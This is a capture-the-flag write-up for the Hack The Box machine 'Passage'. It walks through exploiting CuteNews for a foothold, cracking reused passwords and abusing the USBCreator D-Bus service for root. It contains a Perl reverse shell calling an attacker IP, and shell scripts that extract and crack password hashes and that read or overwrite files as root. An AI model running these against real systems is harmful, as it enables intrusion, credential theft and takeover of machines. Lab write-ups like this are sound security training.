HTB Passage

2021-03-24

Intro

Passage is an Ubuntu box. It has a few privesc paths and a few tricks up its sleeve to frustrate what you might typically do for initial enumeration.

Enumeration

A standard nmap scan shows that SSH is running on port 22 and an Apache web server is running on port 80.

sudo nmap -sV -sC -Pn -oA Passage 10.10.10.206
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-19 17:14 MDT
Nmap scan report for 10.10.10.206
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.44 seconds

SSH could be useful later, but since that version doesn't look out of date, the web server is the first place to look. It seems to be running a CMS called CuteNews and has mostly just filler articles. The most recent post is rather important though.

http://10.10.10.206/index.php?id=11

Fail2Ban

Fail2Ban is a service that mitigates brute-force attacks by banning a source IP after it produces too many failures in a short window. Because it is implemented here, ffuf or another directory buster is going to be a futile effort: the flood of requests gets the attacking IP banned before the wordlist gets anywhere.

Looking through the authors of the articles, two possible users are found, though there isn’t an obvious place to make use of them outside of attempting to bruteforce SSH.

Paul Coles (paul@passege.htb)
Admin (nadav@passege.htb)

The nmap scan and browsing the site reveal the CMS in use, CuteNews. A quick Google search finds a Metasploit module on Exploit DB. That module doesn't seem to function out of the box though, and a related GitHub issue can be found below. There was a fix described, but it didn't lead to a shell in this case.

https://github.com/rapid7/metasploit-framework/issues/13246

Foothold

Eventually, I work my way out and am nudged to take a closer look at the source code of the main page. From this we can see a number of resources being loaded from paths that start with /CuteNews. Navigating to /CuteNews finds a login page.

Some usernames were found earlier but no passwords. However, it is possible to register an account.

Once logged in, the bottom of the screen helpfully shows a version number. That leads to a second Exploit DB script.

https://www.exploit-db.com/exploits/48800

It exploits CVE-2019-11447 to upload a PHP shell through the avatar upload feature, then attempts to extract any credentials from /var/www/html/CuteNews/cdata/users/lines. These can then potentially be cracked to expand access.

First things first though, upgrade the shell. The uploaded web shell works but is far from a full TTY. The old favourite Bash reverse shell doesn't call back, nor does Python 2 or 3. However, Perl does work.

User

perl -e 'use Socket;$i="10.0.14.11";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

The callback is caught with a simple netcat listener, and then the shell can be upgraded: python -c 'import pty; pty.spawn("/bin/bash")'

CrackStation is a quick way to check certain kinds of hashes. These are 64 hex characters each, i.e. unsalted SHA-256 as CuteNews stores them (hashcat mode 1400). There are a couple of matches.

f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc:egre55 (crackstation)

CrackStation didn't get all of them though, so hashcat will have to do some clean-up.

7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1 (hashcat)
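As an added example, not code from the writeup or from exploit 48800, here is the "dump cdata/users/lines, pull the hashes, crack them" step done with plain sh and coreutils, so you can see what the exploit script is actually doing. CuteNews 2.1.x stores one base64-encoded PHP-serialised user record per line and hashes passwords with unsalted SHA-256, so a dictionary attack is one hash per candidate word. The user records, passwords and wordlist below are constructed inside the script; the hashes it produces are not the ones from the box.

```shell
# Added example: extract CuteNews user hashes from a cdata/users/lines-style
# file and run a dictionary attack against them.  Everything here is
# constructed; the real inputs are the dumped lines file and a wordlist.

sha256_hex() {                       # hex SHA-256 of $1 (no trailing newline)
    printf '%s' "$1" | sha256sum | cut -d' ' -f1
}

# Build a CONSTRUCTED cdata/users/lines with two records (made-up passwords).
# Only the fields this script reads are serialised.
make_sample_lines() {
    for rec in "paul:atlanta1" "nadav:S3cretPhrase"; do
        user=${rec%%:*}; pass=${rec#*:}
        h=$(sha256_hex "$pass")
        printf 'a:1:{s:4:"name";a:1:{s:%d:"%s";a:2:{s:4:"name";s:%d:"%s";s:4:"pass";s:64:"%s";}}}' \
            "${#user}" "$user" "${#user}" "$user" "$h" | base64 | tr -d '\n'
        echo
    done
}

# base64-decode every line and print "user hash" pairs.
extract_hashes() {                   # $1 = lines file
    while IFS= read -r line; do
        if [ -n "$line" ]; then
            dec=$(printf '%s' "$line" | base64 -d 2>/dev/null) || continue
            u=$(printf '%s' "$dec" | grep -o 's:4:"name";s:[0-9]*:"[^"]*"' | tail -n1 | sed 's/.*"\([^"]*\)"$/\1/')
            h=$(printf '%s' "$dec" | grep -o 's:4:"pass";s:64:"[0-9a-f]\{64\}"' | sed 's/.*"\([0-9a-f]*\)"$/\1/')
            if [ -n "$u" ] && [ -n "$h" ]; then
                printf '%s %s\n' "$u" "$h"
            fi
        fi
    done < "$1"
}

# Dictionary attack: hash each word once, compare against every target.
# (hashcat -m 1400 does the same thing, only much faster.)
crack_sha256() {                     # $1 = "user hash" file, $2 = wordlist
    while IFS= read -r word; do
        if [ -n "$word" ]; then
            h=$(sha256_hex "$word")
            grep -i " $h\$" "$1" | while read -r u rest; do
                printf '%s:%s\n' "$u" "$word"
            done
        fi
    done < "$2"
}

# End-to-end run on the constructed data; prints user:password for each hit.
demo() {
    tmp=$(mktemp -d)
    make_sample_lines > "$tmp/lines"
    extract_hashes "$tmp/lines" > "$tmp/hashes"
    printf '%s\n' password 123456 atlanta1 egre55 > "$tmp/wordlist"   # constructed wordlist
    crack_sha256 "$tmp/hashes" "$tmp/wordlist"
    rm -rf "$tmp"
}
```

Only paul's constructed password is in the tiny wordlist, so demo prints paul:atlanta1 and nothing for nadav, which mirrors the situation on the box where one hash stays uncracked. Because the hashes are unsalted, a single precomputed SHA-256 of a common password matches every account that uses it, which is exactly why CrackStation's lookup table got two of them for free.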

With passwords and users in hand, the door is open to check for password reuse. paul isn't perfect: su paul with the password atlanta1 is successful.

Paul has an SSH key pair set up that can be borrowed for persistence and a more stable shell. There doesn't seem to be an obvious way to privesc to nadav or root. But the pattern of reusing credentials continues: Paul's SSH key also works for nadav.

Root

One of the first things to do is check the contents of the user's home directory. There is an interesting file,

.viminfo

Inside are references to pkexec, a binary similar to sudo, and to dbus-1. Logging in as nadav over SSH is possible, but nadav's password is not currently known. That rules out a simple win from pkexec, since it is configured to require a password.

On the other hand, dbus-1 does have a vulnerability associated with it.

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

The USBCreator D-Bus service can be leveraged to overwrite arbitrary files as root: its Image method copies a source file to a target path, and because the service runs as root, the copy happens as root in both directions. That gives us an effective read and write primitive as the root user. The command below copies the contents of root.txt over to /tmp/...

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/... true
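As an added example, not the writeup's own command (which it wraps) nor code from the usbcreator project, here are the checks and helpers I would put around that gdbus call before relying on it. It assumes gdbus is installed (Ubuntu package libglib2.0-bin) and that, as on Passage, the service's bus policy only admits root and members of the sudo group; the scratch file path is created with mktemp rather than the /tmp/... used above.

```shell
# Added example: precondition checks plus read/write-as-root helpers around
# the USBCreator Image() method.  Nothing runs unless invoked with "run".

# Can this user talk to the service?  $1 = output of `id -nG`.
# Assumption: the D-Bus policy only allows root and the sudo group to send.
in_sudo_group() {
    for g in $1; do
        [ "$g" = sudo ] && return 0
    done
    return 1
}

# Is the service on the system bus, and does it still expose Image()?
usbcreator_available() {
    command -v gdbus >/dev/null 2>&1 &&
    gdbus introspect --system --dest com.ubuntu.USBCreator \
        --object-path /com/ubuntu/USBCreator 2>/dev/null | grep -q 'Image('
}

# Copy $1 to $2 as root via Image(source, target, allow_unmount).
usbcreator_copy() {
    gdbus call --system --dest com.ubuntu.USBCreator \
        --object-path /com/ubuntu/USBCreator \
        --method com.ubuntu.USBCreator.Image "$1" "$2" true
}

# Read primitive: pre-create a file we own, have root copy over it, cat it.
# Pre-creating the target keeps our ownership, so it stays readable by us.
root_read() {                        # $1 = root-only path, e.g. /root/root.txt
    out=$(mktemp) || return 1
    usbcreator_copy "$1" "$out" >/dev/null && cat "$out"
    rm -f "$out"
}

# Write primitive: stage content locally, then have root copy it over the
# target, e.g. a prepared authorized_keys onto /root/.ssh/authorized_keys.
root_write() {                       # $1 = staged local file, $2 = target path
    usbcreator_copy "$1" "$2" >/dev/null
}

if [ "${1:-}" = run ]; then
    in_sudo_group "$(id -nG)" || { echo "not in the sudo group"; exit 1; }
    usbcreator_available || { echo "USBCreator service not reachable"; exit 1; }
    root_read /root/root.txt
fi
```

The introspection step matters on a real engagement: the service only exists on systems with usbcreator installed, and the bus policy, not the binary, decides who can call it, so a user outside the sudo group gets a D-Bus access-denied error rather than a root copy.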

Closing thoughts

There are a few ways an attacker could get a full shell as root. Root does have valid ssh keys and you could copy these off the same way you got root.txt. Alternatively you could snag /etc/shadow and /etc/passwd and crack the hashes.

Reuse of credentials was a definite theme during the box, and I enjoyed learning about the USBCreator vulnerability. It required sudo group membership but was a bit different from a cookie-cutter GTFOBins entry. Thanks to ChefByzen for creating an awesome box!
